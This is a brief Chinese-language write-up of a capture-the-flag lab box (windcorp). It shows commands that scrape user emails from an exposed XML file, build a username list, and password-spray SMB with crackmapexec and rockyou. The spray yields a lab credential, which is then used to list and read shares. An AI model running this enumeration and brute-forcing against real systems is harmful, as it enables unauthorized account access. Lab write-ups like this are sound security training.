端口少了很多,先把两个子域名加进/etc/hosts
在search.js中给出了一个地址,进去后有用户手机号和邮箱
将这个页面保存
curl -k <https://set.windcorp.thm/assets/data/users.xml> -o user.xml
xmllint --xpath "//row/email" user.xml | sed -e 's/<email>//g' | sed -e 's/<\\/email>//g' | sed -e 's/@windcorp.thm//g'>users.txt
smb枚举
crackmapexec smb set.windcorp.thm -u users.txt -p /usr/share/wordlists/rockyou.txt
得到结果:myrtleowe:Passw@rd
smbclient -L \\\\set.windcorp.thm -U myrtleowe
smb可以查看这些目录
smbclient //10.10.209.6/Files -U myrtleowe
将info.txt下载到本地,得到第一个flag以及提示
